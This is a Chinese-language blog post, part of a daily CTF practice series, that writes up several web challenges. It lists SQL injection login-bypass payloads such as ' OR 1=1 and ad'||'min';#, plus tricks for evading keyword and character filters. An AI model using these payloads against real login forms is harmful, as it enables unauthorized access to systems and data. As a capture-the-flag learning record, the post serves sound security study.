iT邦幫忙

2024 iThome 鐵人賽

DAY 22
0
佛心分享-刷題不只是刷題

一直刷 CTF系列 第 22

一直刷 CTF - Day22

  • 分享至 

  • xImage
  •  

Writeup

第一題:SQL Direct

Image

查了一下知道可以用 \d 先看看 table 的 schema,最後再用 select * from flags; 看看 table 的內容

Image

第二題:Irish-Name-Repo 1

簡單的 SQL Injection,用 ' OR 1=1; # -- 輸入就可以了

Image

第三題:Irish-Name-Repo 2

這題好像是會把 OR 過濾掉,所以試了一下之後只要用 admin'; -- # 就可以了

Image

第四題:Irish-Name-Repo 3

這題只有 password 可以輸入,試試看 ' OR 1=1; -- # 發現不行,想不到其他方法就開個 Burp Suite 看一下,發現他後面會自帶一個 &debug=0 ,試試看改成 1 ,會發現他把 SQL query 顯示出來了

Image

我發現他把 OR 變成 BE 了,似乎是 rot13 ,所以我把 OR 改成 BE ,就成功得到 flag 了

Image

第五題:Web Gauntlet

round 1

filter: or
payload: admin'; -- #

round 2

filter: or, and, like, =, --
payload: admin'; #

round 3

filter: or, and, =, like, >, <, --

但試了好久才她好像還擋了空白 OwO

payload: admin';#

round 4

filter: or, and, =, like, >, <, --, admin

查了一下發現 || 可以把兩個字串連接起來,所以把 admin' 改成 ad'||'min' 就可以了

payload: ad'||'min';#

round 5

filter: or, and, =, like, >, <, --, union, admin

payload: ad'||'min';#

然後到 filter.php 就可以看到 flag 了

Image

第六題:Web Gauntlet 2

filter: or and true false union like = > < ; -- /* */ admin

試了才發現好像 # 根本沒有起到註解的用途,前面好像是放辛酸的,只好修改 password 使得 query 成立,所以就把 password 設為 a' is not 'b 就可以了

payload: username ad'||'min, password a' is not 'b

Image

第七題:Web Gauntlet 3

這題好像跟上一題一模一樣? 就把上提的 payload 照抄就過了

Image

參考資料


上一篇
一直刷 CTF - Day21
下一篇
一直刷 CTF - Day23
系列文
一直刷 CTF30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言